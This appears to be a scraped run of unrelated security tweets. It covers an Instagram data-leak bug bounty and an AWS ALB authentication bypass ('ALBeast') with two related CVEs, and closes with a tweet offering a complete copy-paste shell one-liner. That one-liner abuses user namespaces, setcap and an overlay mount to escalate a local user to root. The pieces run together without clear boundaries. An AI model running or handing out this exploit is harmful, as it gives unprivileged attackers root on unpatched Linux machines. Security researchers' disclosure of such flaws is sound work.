#BugBounty
"Instagram User? your details may Leaked"
Facebook confirmed my critical vulnerability (leads to "Data Leak" of Instagram Users):
https://t.co/N582NHxhpH
Thanks! @UKZak@Forbes@LukasStefanko
1/ When the #ALBeast issue meets open-source - Story time about how discovering ALBeast led to finding two additional CVEs (2024-8901 & CVE-2024-10125) 🧵👇
🚨We could bypass authentication to thousands of applications by exploiting a configuration-based vulnerability in AWS ALB. Here’s everything you need to know about the #ALBeast vulnerability discovered by @MiggoSecurity
Exploit is so easy it fits in a tweet🔥
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'